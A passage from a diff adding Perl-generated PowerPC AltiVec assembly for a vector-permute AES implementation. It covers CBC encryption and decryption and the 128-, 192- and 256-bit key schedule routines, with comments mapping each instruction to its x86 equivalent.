+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,0x04,1,0x80,0,3,0
+	.long	0
+.size	.vpaes_decrypt,.-.vpaes_decrypt
+
+.globl	.vpaes_cbc_encrypt
+.align	5
+.vpaes_cbc_encrypt:
+	${UCMP}i r5,16
+	bltlr-
+
+	$STU	$sp,-`($FRAME+2*$SIZE_T)`($sp)
+	mflr	r0
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mfspr	r12, 256
+	stvx	v20,r10,$sp
+	addi	r10,r10,32
+	stvx	v21,r11,$sp
+	addi	r11,r11,32
+	stvx	v22,r10,$sp
+	addi	r10,r10,32
+	stvx	v23,r11,$sp
+	addi	r11,r11,32
+	stvx	v24,r10,$sp
+	addi	r10,r10,32
+	stvx	v25,r11,$sp
+	addi	r11,r11,32
+	stvx	v26,r10,$sp
+	addi	r10,r10,32
+	stvx	v27,r11,$sp
+	addi	r11,r11,32
+	stvx	v28,r10,$sp
+	addi	r10,r10,32
+	stvx	v29,r11,$sp
+	addi	r11,r11,32
+	stvx	v30,r10,$sp
+	stvx	v31,r11,$sp
+	stw	r12,`$FRAME-4`($sp)	# save vrsave
+	$PUSH	r30,`$FRAME+$SIZE_T*0`($sp)
+	$PUSH	r31,`$FRAME+$SIZE_T*1`($sp)
+	li	r9, -16
+	$PUSH	r0, `$FRAME+$SIZE_T*2+$LRSAVE`($sp)
+
+	and	r30, r5, r9		# copy length&-16
+	mr	r5, r6			# copy pointer to key
+	mr	r31, r7			# copy pointer to iv
+	blt	Lcbc_abort
+	cmpwi	r8, 0			# test direction
+	li	r6, -1
+	mr	r7, r12			# copy vrsave
+	mtspr	256, r6			# preserve all AltiVec registers
+
+	lvx	v24, 0, r31		# load [potentially unaligned] iv
+	li	r9, 15
+	?lvsl	$inpperm, 0, r31
+	lvx	v25, r9, r31
+	?vperm	v24, v24, v25, $inpperm
+
+	neg	r8, $inp		# prepare for unaligned access
+	 vxor	v7, v7, v7
+	?lvsl	$keyperm, 0, $key
+	 ?lvsr	$outperm, 0, $out
+	?lvsr	$inpperm, 0, r8		# -$inp
+	 vnor	$outmask, v7, v7	# 0xff..ff
+	lvx	$inptail, 0, $inp
+	 ?vperm	$outmask, v7, $outmask, $outperm
+	addi	$inp, $inp, 15		# 15 is not a typo
+	 lvx	$outhead, 0, $out
+
+	beq	Lcbc_decrypt
+
+	bl	_vpaes_encrypt_preheat
+	li	r0, 16
+
+Lcbc_enc_loop:
+	vmr	v0, $inptail
+	lvx	$inptail, 0, $inp
+	addi	$inp, $inp, 16
+	?vperm	v0, v0, $inptail, $inpperm
+	vxor	v0, v0, v24		# ^= iv
+
+	bl	_vpaes_encrypt_core
+
+	vmr	v24, v0			# put aside iv
+	sub.	r30, r30, r0		# len -= 16
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v1, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v1, 0, $out
+	addi	$out, $out, 16
+	bne	Lcbc_enc_loop
+
+	b	Lcbc_done
+
+.align	5
+Lcbc_decrypt:
+	bl	_vpaes_decrypt_preheat
+	li	r0, 16
+
+Lcbc_dec_loop:
+	vmr	v0, $inptail
+	lvx	$inptail, 0, $inp
+	addi	$inp, $inp, 16
+	?vperm	v0, v0, $inptail, $inpperm
+	vmr	v25, v0			# put aside input
+
+	bl	_vpaes_decrypt_core
+
+	vxor	v0, v0, v24		# ^= iv
+	vmr	v24, v25
+	sub.	r30, r30, r0		# len -= 16
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v1, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v1, 0, $out
+	addi	$out, $out, 16
+	bne	Lcbc_dec_loop
+
+Lcbc_done:
+	addi	$out, $out, -1
+	lvx	v1, 0, $out		# redundant in aligned case
+	vsel	v1, $outhead, v1, $outmask
+	stvx	v1, 0, $out
+
+	neg	r8, r31			# write [potentially unaligned] iv
+	?lvsl	$outperm, 0, r8
+	li	r6, 15
+	vnor	$outmask, v7, v7	# 0xff..ff
+	?vperm	$outmask, v7, $outmask, $outperm
+	lvx	$outhead, 0, r31
+	vperm	v24, v24, v24, $outperm	# rotate right/left
+	vsel	v0, $outhead, v24, $outmask
+	lvx	v1, r6, r31
+	stvx	v0, 0, r31
+	vsel	v1, v24, v1, $outmask
+	stvx	v1, r6, r31
+
+	mtspr	256, r7			# restore vrsave
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	lvx	v20,r10,$sp
+	addi	r10,r10,32
+	lvx	v21,r11,$sp
+	addi	r11,r11,32
+	lvx	v22,r10,$sp
+	addi	r10,r10,32
+	lvx	v23,r11,$sp
+	addi	r11,r11,32
+	lvx	v24,r10,$sp
+	addi	r10,r10,32
+	lvx	v25,r11,$sp
+	addi	r11,r11,32
+	lvx	v26,r10,$sp
+	addi	r10,r10,32
+	lvx	v27,r11,$sp
+	addi	r11,r11,32
+	lvx	v28,r10,$sp
+	addi	r10,r10,32
+	lvx	v29,r11,$sp
+	addi	r11,r11,32
+	lvx	v30,r10,$sp
+	lvx	v31,r11,$sp
+Lcbc_abort:
+	$POP	r0, `$FRAME+$SIZE_T*2+$LRSAVE`($sp)
+	$POP	r30,`$FRAME+$SIZE_T*0`($sp)
+	$POP	r31,`$FRAME+$SIZE_T*1`($sp)
+	mtlr	r0
+	addi	$sp,$sp,`$FRAME+$SIZE_T*2`
+	blr
+	.long	0
+	.byte	0,12,0x04,1,0x80,2,6,0
+	.long	0
+.size	.vpaes_cbc_encrypt,.-.vpaes_cbc_encrypt
+___
+}
+{
+my ($inp,$bits,$out)=map("r$_",(3..5));
+my $dir="cr1";
+my ($invlo,$invhi,$iptlo,$ipthi,$rcon) = map("v$_",(10..13,24));
+
+$code.=<<___;
+########################################################
+##                                                    ##
+##                  AES key schedule                  ##
+##                                                    ##
+########################################################
+.align	4
+_vpaes_key_preheat:
+	mflr	r8
+	bl	Lconsts
+	mtlr	r8
+	li	r11, 0xc0		# Lk_inv
+	li	r10, 0xd0
+	li	r9,  0xe0		# L_ipt
+	li	r8,  0xf0
+
+	vspltisb	v8,4		# 0x04..04
+	vxor	v9,v9,v9		# 0x00..00
+	lvx	$invlo, r12, r11	# Lk_inv
+	li	r11, 0x120
+	lvx	$invhi, r12, r10
+	li	r10, 0x130
+	lvx	$iptlo, r12, r9		# Lk_ipt
+	li	r9, 0x220
+	lvx	$ipthi, r12, r8
+	li	r8, 0x230
+
+	lvx	v14, r12, r11		# Lk_sb1
+	li	r11, 0x240
+	lvx	v15, r12, r10
+	li	r10, 0x250
+
+	lvx	v16, r12, r9		# Lk_dksd
+	li	r9, 0x260
+	lvx	v17, r12, r8
+	li	r8, 0x270
+	lvx	v18, r12, r11		# Lk_dksb
+	li	r11, 0x280
+	lvx	v19, r12, r10
+	li	r10, 0x290
+	lvx	v20, r12, r9		# Lk_dkse
+	li	r9, 0x2a0
+	lvx	v21, r12, r8
+	li	r8, 0x2b0
+	lvx	v22, r12, r11		# Lk_dks9
+	lvx	v23, r12, r10
+
+	lvx	v24, r12, r9		# Lk_rcon
+	lvx	v25, 0, r12		# Lk_mc_forward[0]
+	lvx	v26, r12, r8		# Lks63
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.align	4
+_vpaes_schedule_core:
+	mflr	r7
+
+	bl	_vpaes_key_preheat	# load the tables
+
+	#lvx	v0, 0, $inp		# vmovdqu	(%rdi),	%xmm0		# load key (unaligned)
+	neg	r8, $inp		# prepare for unaligned access
+	lvx	v0, 0, $inp
+	addi	$inp, $inp, 15		# 15 is not typo
+	?lvsr	$inpperm, 0, r8		# -$inp
+	lvx	v6, 0, $inp		# v6 serves as inptail
+	addi	$inp, $inp, 8
+	?vperm	v0, v0, v6, $inpperm
+
+	# input transform
+	vmr	v3, v0			# vmovdqa	%xmm0,	%xmm3
+	bl	_vpaes_schedule_transform
+	vmr	v7, v0			# vmovdqa	%xmm0,	%xmm7
+
+	bne	$dir, Lschedule_am_decrypting
+
+	# encrypting, output zeroth round key after transform
+	li	r8, 0x30		# mov	\$0x30,%r8d
+	addi	r10, r12, 0x80		# lea	.Lk_sr(%rip),%r10
+
+	?lvsr	$outperm, 0, $out	# prepare for unaligned access
+	vnor	$outmask, v9, v9	# 0xff..ff
+	lvx	$outhead, 0, $out
+	?vperm	$outmask, v9, $outmask, $outperm
+
+	#stvx	v0, 0, $out		# vmovdqu	%xmm0,	(%rdx)
+	vperm	v1, v0, v0, $outperm	# rotate right/left
+	vsel	v2, $outhead, v1, $outmask
+	vmr	$outhead, v1
+	stvx	v2, 0, $out
+	b	Lschedule_go
+
+Lschedule_am_decrypting:
+	srwi	r8, $bits, 1		# shr	\$1,%r8d
+	andi.	r8, r8, 32		# and	\$32,%r8d
+	xori	r8, r8, 32		# xor	\$32,%r8d	# nbits==192?0:32
+	addi	r10, r12, 0x80		# lea	.Lk_sr(%rip),%r10
+	# decrypting, output zeroth round key after shiftrows
+	lvx	v1, r8, r10		# vmovdqa	(%r8,%r10),	%xmm1
+	vperm	v4, v3, v3, v1		# vpshufb	%xmm1,	%xmm3,	%xmm3
+
+	neg	r0, $out		# prepare for unaligned access
+	?lvsl	$outperm, 0, r0
+	addi	$out, $out, 15		# 15 is not typo
+	vnor	$outmask, v9, v9	# 0xff..ff
+	lvx	$outhead, 0, $out
+	?vperm	$outmask, $outmask, v9, $outperm
+
+	#stvx	v4, 0, $out		# vmovdqu	%xmm3,	(%rdx)
+	vperm	v4, v4, v4, $outperm	# rotate right/left
+	vsel	v2, $outhead, v4, $outmask
+	vmr	$outhead, v4
+	stvx	v2, 0, $out
+	xori	r8, r8, 0x30		# xor	\$0x30, %r8
+
+Lschedule_go:
+	cmplwi	$bits, 192		# cmp	\$192,	%esi
+	bgt	Lschedule_256
+	beq	Lschedule_192
+	# 128: fall though
+
+##
+##  .schedule_128
+##
+##  128-bit specific part of key schedule.
+##
+##  This schedule is really simple, because all its parts
+##  are accomplished by the subroutines.
+##
+Lschedule_128:
+	li	r0, 10			# mov	\$10, %esi
+	mtctr	r0
+
+Loop_schedule_128:
+	bl 	_vpaes_schedule_round
+	bdz 	Lschedule_mangle_last	# dec	%esi
+	bl	_vpaes_schedule_mangle	# write output
+	b 	Loop_schedule_128
+
+##
+##  .aes_schedule_192
+##
+##  192-bit specific part of key schedule.
+##
+##  The main body of this schedule is the same as the 128-bit
+##  schedule, but with more smearing.  The long, high side is
+##  stored in %xmm7 as before, and the short, low side is in
+##  the high bits of %xmm6.
+##
+##  This schedule is somewhat nastier, however, because each
+##  round produces 192 bits of key material, or 1.5 round keys.
+##  Therefore, on each cycle we do 2 rounds and produce 3 round
+##  keys.
+##
+.align	4
+Lschedule_192:
+	li	r0, 4			# mov	\$4,	%esi
+	lvx	v0, 0, $inp
+	?vperm	v0, v6, v0, $inpperm
+	?vsldoi	v0, v3, v0, 8		# vmovdqu	8(%rdi),%xmm0		# load key part 2 (very unaligned)
+	bl	_vpaes_schedule_transform	# input transform
+	?vsldoi	v6, v0, v9, 8
+	?vsldoi	v6, v9, v6, 8		# clobber "low" side with zeros
+	mtctr	r0
+
+Loop_schedule_192:
+	bl	_vpaes_schedule_round
+	?vsldoi	v0, v6, v0, 8		# vpalignr	\$8,%xmm6,%xmm0,%xmm0
+	bl	_vpaes_schedule_mangle	# save key n
+	bl	_vpaes_schedule_192_smear
+	bl	_vpaes_schedule_mangle	# save key n+1
+	bl	_vpaes_schedule_round
+	bdz 	Lschedule_mangle_last	# dec	%esi
+	bl	_vpaes_schedule_mangle	# save key n+2
+	bl	_vpaes_schedule_192_smear
+	b	Loop_schedule_192
+
+##
+##  .aes_schedule_256
+##
+##  256-bit specific part of key schedule.
+##
+##  The structure here is very similar to the 128-bit
+##  schedule, but with an additional "low side" in
+##  %xmm6.  The low side's rounds are the same as the
+##  high side's, except no rcon and no rotation.
+##
+.align	4
+Lschedule_256:
+	li	r0, 7			# mov	\$7, %esi
+	addi	$inp, $inp, 8
+	lvx	v0, 0, $inp		# vmovdqu	16(%rdi),%xmm0		# load key part 2 (unaligned)
+	?vperm	v0, v6, v0, $inpperm
+	bl	_vpaes_schedule_transform	# input transform
+	mtctr	r0
+
+Loop_schedule_256:
+	bl	_vpaes_schedule_mangle	# output low result
+	vmr	v6, v0			# vmovdqa	%xmm0,	%xmm6		# save cur_lo in xmm6
+
+	# high round
+	bl	_vpaes_schedule_round
+	bdz 	Lschedule_mangle_last	# dec	%esi
+	bl	_vpaes_schedule_mangle	
+
+	# low round. swap xmm7 and xmm6
+	?vspltw	v0, v0, 3		# vpshufd	\$0xFF,	%xmm0,	%xmm0
+	vmr	v5, v7			# vmovdqa	%xmm7,	%xmm5
+	vmr	v7, v6			# vmovdqa	%xmm6,	%xmm7
+	bl	_vpaes_schedule_low_round
+	vmr	v7, v5			# vmovdqa	%xmm5,	%xmm7
+	
+	b	Loop_schedule_256
+##
+##  .aes_schedule_mangle_last
+##
+##  Mangler for last round of key schedule
+##  Mangles %xmm0
+##    when encrypting, outputs out(%xmm0) ^ 63
+##    when decrypting, outputs unskew(%xmm0)
+##
+##  Always called right before return... jumps to cleanup and exits
+##
+.align	4
+Lschedule_mangle_last:
+	# schedule last round key from xmm0
+	li	r11, 0x2e0		# lea	.Lk_deskew(%rip),%r11
+	li	r9,  0x2f0
+	bne	$dir, Lschedule_mangle_last_dec
+
+	# encrypting
+	lvx	v1, r8, r10		# vmovdqa	(%r8,%r10),%xmm1
+	li	r11, 0x2c0		# lea		.Lk_opt(%rip),	%r11	# prepare to output transform
+	li	r9,  0x2d0		# prepare to output transform
+	vperm	v0, v0, v0, v1		# vpshufb	%xmm1,	%xmm0,	%xmm0	# output permute
+
+	lvx	$iptlo, r11, r12	# reload $ipt
+	lvx	$ipthi, r9, r12
+	addi	$out, $out, 16		# add	\$16,	%rdx
+	vxor	v0, v0, v26		# vpxor		.Lk_s63(%rip),	%xmm0,	%xmm0
+	bl	_vpaes_schedule_transform	# output transform
+
+	#stvx	v0, r0, $out		# vmovdqu	%xmm0,	(%rdx)		# save last key
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v2, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v2, 0, $out
+
+	addi	$out, $out, 15		# 15 is not typo
+	lvx	v1, 0, $out		# redundant in aligned case
+	vsel	v1, $outhead, v1, $outmask
+	stvx	v1, 0, $out
+	b	Lschedule_mangle_done
+
+.align	4
+Lschedule_mangle_last_dec:
+	lvx	$iptlo, r11, r12	# reload $ipt
+	lvx	$ipthi, r9,  r12
+	addi	$out, $out, -16		# add	\$-16,	%rdx 
+	vxor	v0, v0, v26		# vpxor	.Lk_s63(%rip),	%xmm0,	%xmm0
+	bl	_vpaes_schedule_transform	# output transform
+
+	#stvx	v0, r0, $out		# vmovdqu	%xmm0,	(%rdx)		# save last key
+	vperm	v0, v0, v0, $outperm	# rotate right/left
+	vsel	v2, $outhead, v0, $outmask
+	vmr	$outhead, v0
+	stvx	v2, 0, $out
+
+	addi	$out, $out, -15		# -15 is not typo
+	lvx	v1, 0, $out		# redundant in aligned case
+	vsel	v1, $outhead, v1, $outmask
+	stvx	v1, 0, $out
+
+Lschedule_mangle_done:
+	mtlr	r7
+	# cleanup
+	vxor	v0, v0, v0		# vpxor		%xmm0,	%xmm0,	%xmm0
+	vxor	v1, v1, v1		# vpxor		%xmm1,	%xmm1,	%xmm1
+	vxor	v2, v2, v2		# vpxor		%xmm2,	%xmm2,	%xmm2
+	vxor	v3, v3, v3		# vpxor		%xmm3,	%xmm3,	%xmm3
+	vxor	v4, v4, v4		# vpxor		%xmm4,	%xmm4,	%xmm4
+	vxor	v5, v5, v5		# vpxor		%xmm5,	%xmm5,	%xmm5
+	vxor	v6, v6, v6		# vpxor		%xmm6,	%xmm6,	%xmm6
+	vxor	v7, v7, v7		# vpxor		%xmm7,	%xmm7,	%xmm7
+
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  .aes_schedule_192_smear
+##
+##  Smear the short, low side in the 192-bit key schedule.
+##
+##  Inputs:
+##    %xmm7: high side, b  a  x  y
+##    %xmm6:  low side, d  c  0  0
+##    %xmm13: 0
+##
+##  Outputs:
+##    %xmm6: b+c+d  b+c  0  0
+##    %xmm0: b+c+d  b+c  b  a
+##
+.align	4
+_vpaes_schedule_192_smear:
+	?vspltw	v0, v7, 3
+	?vsldoi	v1, v9, v6, 12		# vpshufd	\$0x80,	%xmm6,	%xmm1	# d c 0 0 -> c 0 0 0
+	?vsldoi	v0, v7, v0, 8		# vpshufd	\$0xFE,	%xmm7,	%xmm0	# b a _ _ -> b b b a
+	vxor	v6, v6, v1		# vpxor		%xmm1,	%xmm6,	%xmm6	# -> c+d c 0 0
+	vxor	v6, v6, v0		# vpxor		%xmm0,	%xmm6,	%xmm6	# -> b+c+d b+c b a
+	vmr	v0, v6
+	?vsldoi	v6, v6, v9, 8
+	?vsldoi	v6, v9, v6, 8		# clobber low side with zeros
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  .aes_schedule_round
+##
+##  Runs one main round of the key schedule on %xmm0, %xmm7
+##
+##  Specifically, runs subbytes on the high dword of %xmm0
+##  then rotates it by one byte and xors into the low dword of
+##  %xmm7.
+##
+##  Adds rcon from low byte of %xmm8, then rotates %xmm8 for
+##  next rcon.
+##
+##  Smears the dwords of %xmm7 by xoring the low into the
+##  second low, result into third, result into highest.
+##
+##  Returns results in %xmm7 = %xmm0.
+##  Clobbers %xmm1-%xmm4, %r11.
+##
+.align	4
+_vpaes_schedule_round:
+	# extract rcon from xmm8
+	#vxor	v4, v4, v4		# vpxor		%xmm4,	%xmm4,	%xmm4
+	?vsldoi	v1, $rcon, v9, 15	# vpalignr	\$15,	%xmm8,	%xmm4,	%xmm1
+	?vsldoi	$rcon, $rcon, $rcon, 15	# vpalignr	\$15,	%xmm8,	%xmm8,	%xmm8
+	vxor	v7, v7, v1		# vpxor		%xmm1,	%xmm7,	%xmm7
+
+	# rotate
+	?vspltw	v0, v0, 3		# vpshufd	\$0xFF,	%xmm0,	%xmm0
+	?vsldoi	v0, v0, v0, 1		# vpalignr	\$1,	%xmm0,	%xmm0,	%xmm0
+
+	# fall through...
+
+	# low round: same as high round, but no rotation and no rcon.
+_vpaes_schedule_low_round:
+	# smear xmm7
+	?vsldoi	v1, v9, v7, 12		# vpslldq	\$4,	%xmm7,	%xmm1
+	vxor	v7, v7, v1		# vpxor		%xmm1,	%xmm7,	%xmm7
+	vspltisb	v1, 0x0f	# 0x0f..0f
+	?vsldoi	v4, v9, v7, 8		# vpslldq	\$8,	%xmm7,	%xmm4
+
+	# subbytes
+	vand	v1, v1, v0		# vpand		%xmm9,	%xmm0,	%xmm1		# 0 = k
+	vsrb	v0, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0		# 1 = i
+	 vxor	v7, v7, v4		# vpxor		%xmm4,	%xmm7,	%xmm7
+	vperm	v2, $invhi, v9, v1	# vpshufb	%xmm1,	%xmm11,	%xmm2		# 2 = a/k
+	vxor	v1, v1, v0		# vpxor		%xmm0,	%xmm1,	%xmm1		# 0 = j
+	vperm	v3, $invlo, v9, v0	# vpshufb	%xmm0, 	%xmm10,	%xmm3		# 3 = 1/i
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3		# 3 = iak = 1/i + a/k
+	vperm	v4, $invlo, v9, v1	# vpshufb	%xmm1,	%xmm10,	%xmm4		# 4 = 1/j
+	 vxor	v7, v7, v26		# vpxor		.Lk_s63(%rip),	%xmm7,	%xmm7
+	vperm	v3, $invlo, v9, v3	# vpshufb	%xmm3,	%xmm10,	%xmm3		# 2 = 1/iak
+	vxor	v4, v4, v2		# vpxor		%xmm2,	%xmm4,	%xmm4		# 4 = jak = 1/j + a/k
+	vperm	v2, $invlo, v9, v4	# vpshufb	%xmm4,	%xmm10,	%xmm2		# 3 = 1/jak
+	vxor	v3, v3, v1		# vpxor		%xmm1,	%xmm3,	%xmm3		# 2 = io
+	vxor	v2, v2, v0		# vpxor		%xmm0,	%xmm2,	%xmm2		# 3 = jo
+	vperm	v4, v15, v9, v3		# vpshufb	%xmm3,	%xmm13,	%xmm4		# 4 = sbou
+	vperm	v1, v14, v9, v2		# vpshufb	%xmm2,	%xmm12,	%xmm1		# 0 = sb1t
+	vxor	v1, v1, v4		# vpxor		%xmm4,	%xmm1,	%xmm1		# 0 = sbox output
+
+	# add in smeared stuff
+	vxor	v0, v1, v7		# vpxor		%xmm7,	%xmm1,	%xmm0
+	vxor	v7, v1, v7		# vmovdqa	%xmm0,	%xmm7
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  .aes_schedule_transform
+##
+##  Linear-transform %xmm0 according to tables at (%r11)
+##
+##  Requires that %xmm9 = 0x0F0F... as in preheat
+##  Output in %xmm0
+##  Clobbers %xmm2
+##
+.align	4
+_vpaes_schedule_transform:
+	#vand	v1, v0, v9		# vpand		%xmm9,	%xmm0,	%xmm1
+	vsrb	v2, v0, v8		# vpsrlb	\$4,	%xmm0,	%xmm0
+					# vmovdqa	(%r11),	%xmm2 	# lo
+	vperm	v0, $iptlo, $iptlo, v0	# vpshufb	%xmm1,	%xmm2,	%xmm2
+					# vmovdqa	16(%r11),	%xmm1 # hi
+	vperm	v2, $ipthi, $ipthi, v2	# vpshufb	%xmm0,	%xmm1,	%xmm0
+	vxor	v0, v0, v2		# vpxor		%xmm2,	%xmm0,	%xmm0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+##
+##  .aes_schedule_mangle
+##
+##  Mangle xmm0 from (basis-transformed) standard version
+##  to our version.
+##
+##  On encrypt,
+##    xor with 0x63
+##    multiply by circulant 0,1,1,1
+##    apply shiftrows transform
+##
+##  On decrypt,
+##    xor with 0x63
+##    multiply by "inverse mixcolumns" circulant E,B,D,9
+##    deskew
+##    apply shiftrows transform
+##
+##
+##  Writes out to (%rdx), and increments or decrements it
+##  Keeps track of round number mod 4 in %r8
+##  Preserves xmm0
+##  Clobbers xmm1-xmm5
+##
+.align	4
+_vpaes_schedule_mangle:
+	#vmr	v4, v0			# vmovdqa	%xmm0,	%xmm4	# save xmm0 for later
+					# vmovdqa	.Lk_mc_forward(%rip),%xmm5
+	bne	$dir, Lschedule_mangle_dec
+
+	# encrypting
+	vxor	v4, v0, v26		# vpxor	.Lk_s63(%rip),	%xmm0,	%xmm4
+	addi	$out, $out, 16		# add	\$16,	%rdx
+	vperm	v4, v4, v4, v25		# vpshufb	%xmm5,	%xmm4,	%xmm4
+	vperm	v1, v4, v4, v25		# vpshufb	%xmm5,	%xmm4,	%xmm1
+	vperm	v3, v1, v1, v25		# vpshufb	%xmm5,	%xmm1,	%xmm3
+	vxor	v4, v4, v1		# vpxor		%xmm1,	%xmm4,	%xmm4
+	lvx	v1, r8, r10		# vmovdqa	(%r8,%r10),	%xmm1
+	vxor	v3, v3, v4		# vpxor		%xmm4,	%xmm3,	%xmm3
+
+	vperm	v3, v3, v3, v1		# vpshufb	%xmm1,	%xmm3,	%xmm3
+	addi	r8, r8, -16		# add	\$-16,	%r8
+	andi.	r8, r8, 0x30		# and	\$0x30,	%r8
+
+	#stvx	v3, 0, $out		# vmovdqu	%xmm3,	(%rdx)
+	vperm	v1, v3, v3, $outperm	# rotate right/left
+	vsel	v2, $outhead, v1, $outmask
+	vmr	$outhead, v1
+	stvx	v2, 0, $out
+	blr
+
+.align	4
+Lschedule_mangle_dec:
+	# inverse mix columns
+					# lea	.Lk_dksd(%rip),%r11
+	vsrb	v1, v0, v8		# vpsrlb	\$4,	%xmm4,	%xmm1	# 1 = hi
+	#and	v4, v0, v9		# vpand		%xmm9,	%xmm4,	%xmm4	# 4 = lo
+
+					# vmovdqa	0x00(%r11),	%xmm2
+	vperm	v2, v16, v16, v0	# vpshufb	%xmm4,	%xmm2,	%xmm2
+					# vmovdqa	0x10(%r11),	%xmm3
+	vperm	v3, v17, v17, v1	# vpshufb	%xmm1,	%xmm3,	%xmm3
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3
+	vperm	v3, v3, v9, v25		# vpshufb	%xmm5,	%xmm3,	%xmm3
+
+					# vmovdqa	0x20(%r11),	%xmm2
+	vperm	v2, v18, v18, v0	# vpshufb	%xmm4,	%xmm2,	%xmm2
+	vxor	v2, v2, v3		# vpxor		%xmm3,	%xmm2,	%xmm2
+					# vmovdqa	0x30(%r11),	%xmm3
+	vperm	v3, v19, v19, v1	# vpshufb	%xmm1,	%xmm3,	%xmm3
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3
+	vperm	v3, v3, v9, v25		# vpshufb	%xmm5,	%xmm3,	%xmm3
+
+					# vmovdqa	0x40(%r11),	%xmm2
+	vperm	v2, v20, v20, v0	# vpshufb	%xmm4,	%xmm2,	%xmm2
+	vxor	v2, v2, v3		# vpxor		%xmm3,	%xmm2,	%xmm2
+					# vmovdqa	0x50(%r11),	%xmm3
+	vperm	v3, v21, v21, v1	# vpshufb	%xmm1,	%xmm3,	%xmm3
+	vxor	v3, v3, v2		# vpxor		%xmm2,	%xmm3,	%xmm3
+
+					# vmovdqa	0x60(%r11),	%xmm2
+	vperm	v2, v22, v22, v0	# vpshufb	%xmm4,	%xmm2,	%xmm2
+	vperm	v3, v3, v9, v25		# vpshufb	%xmm5,	%xmm3,	%xmm3
+					# vmovdqa	0x70(%r11),	%xmm4
+	vperm	v4, v23, v23, v1	# vpshufb	%xmm1,	%xmm4,	%xmm4
+	lvx	v1, r8, r10		# vmovdqa	(%r8,%r10),	%xmm1
+	vxor	v2, v2, v3		# vpxor		%xmm3,	%xmm2,	%xmm2
+	vxor	v3, v4, v2		# vpxor		%xmm2,	%xmm4,	%xmm3
+
+	addi	$out, $out, -16		# add	\$-16,	%rdx
+
+	vperm	v3, v3, v3, v1		# vpshufb	%xmm1,	%xmm3,	%xmm3
+	addi	r8, r8, -16		# add	\$-16,	%r8
+	andi.	r8, r8, 0x30		# and	\$0x30,	%r8
+
+	#stvx	v3, 0, $out		# vmovdqu	%xmm3,	(%rdx)
+	vperm	v1, v3, v3, $outperm	# rotate right/left
+	vsel	v2, $outhead, v1, $outmask
+	vmr	$outhead, v1
+	stvx	v2, 0, $out
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+
+.globl	.vpaes_set_encrypt_key
+.align	5
+.vpaes_set_encrypt_key:
+	$STU	$sp,-$FRAME($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mflr	r0
+	mfspr	r6, 256			# save vrsave
+	stvx	v20,r10,$sp
+	addi	r10,r10,32
+	stvx	v21,r11,$sp
+	addi	r11,r11,32
+	stvx	v22,r10,$sp
+	addi	r10,r10,32
+	stvx	v23,r11,$sp
+	addi	r11,r11,32
+	stvx	v24,r10,$sp
+	addi	r10,r10,32
+	stvx	v25,r11,$sp
+	addi	r11,r11,32
+	stvx	v26,r10,$sp
+	addi	r10,r10,32
+	stvx	v27,r11,$sp
+	addi	r11,r11,32
+	stvx	v28,r10,$sp
+	addi	r10,r10,32
+	stvx	v29,r11,$sp
+	addi	r11,r11,32
+	stvx	v30,r10,$sp
+	stvx	v31,r11,$sp
+	stw	r6,`$FRAME-4`($sp)	# save vrsave
+	li	r7, -1
+	$PUSH	r0, `$FRAME+$LRSAVE`($sp)
+	mtspr	256, r7			# preserve all AltiVec registers
+
+	srwi	r9, $bits, 5		# shr	\$5,%eax
+	addi	r9, r9, 6		# add	\$5,%eax
+	stw	r9, 240($out)		# mov	%eax,240(%rdx)	# AES_KEY->rounds = nbits/32+5;
+
+	cmplw	$dir, $bits, $bits	# set encrypt direction
+	li	r8, 0x30		# mov	\$0x30,%r8d
+	bl	_vpaes_schedule_core
+
+	$POP	r0, `$FRAME+$LRSAVE`($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mtspr	256, r6			# restore vrsave
+	mtlr	r0
+	xor	r3, r3, r3
+	lvx	v20,r10,$sp
+	addi	r10,r10,32
+	lvx	v21,r11,$sp
+	addi	r11,r11,32
+	lvx	v22,r10,$sp
+	addi	r10,r10,32
+	lvx	v23,r11,$sp
+	addi	r11,r11,32
+	lvx	v24,r10,$sp
+	addi	r10,r10,32
+	lvx	v25,r11,$sp
+	addi	r11,r11,32
+	lvx	v26,r10,$sp
+	addi	r10,r10,32
+	lvx	v27,r11,$sp
+	addi	r11,r11,32
+	lvx	v28,r10,$sp
+	addi	r10,r10,32
+	lvx	v29,r11,$sp
+	addi	r11,r11,32
+	lvx	v30,r10,$sp
+	lvx	v31,r11,$sp
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,0x04,1,0x80,0,3,0
+	.long	0
+.size	.vpaes_set_encrypt_key,.-.vpaes_set_encrypt_key
+
+.globl	.vpaes_set_decrypt_key
+.align	4
+.vpaes_set_decrypt_key:
+	$STU	$sp,-$FRAME($sp)
+	li	r10,`15+6*$SIZE_T`
+	li	r11,`31+6*$SIZE_T`
+	mflr	r0
+	mfspr	r6, 256			# save vrsave
+	stvx	v20,r10,$sp
+	addi	r10,r10,32
+	stvx	v21,r11,$sp
+	addi	r11,r11,32
+	stvx	v22,r10,$sp
+	addi	r10,r10,32
+	stvx	v23,r11,$sp
+	addi	r11,r11,32
+	stvx	v24,r10,$sp
+	addi	r10,r10,32
+	stvx	v25,r11,$sp
+	addi	r11,r11,32
+	stvx	v26,r10,$sp
+	addi	r10,r10,32
+	stvx	v27,r11,$sp
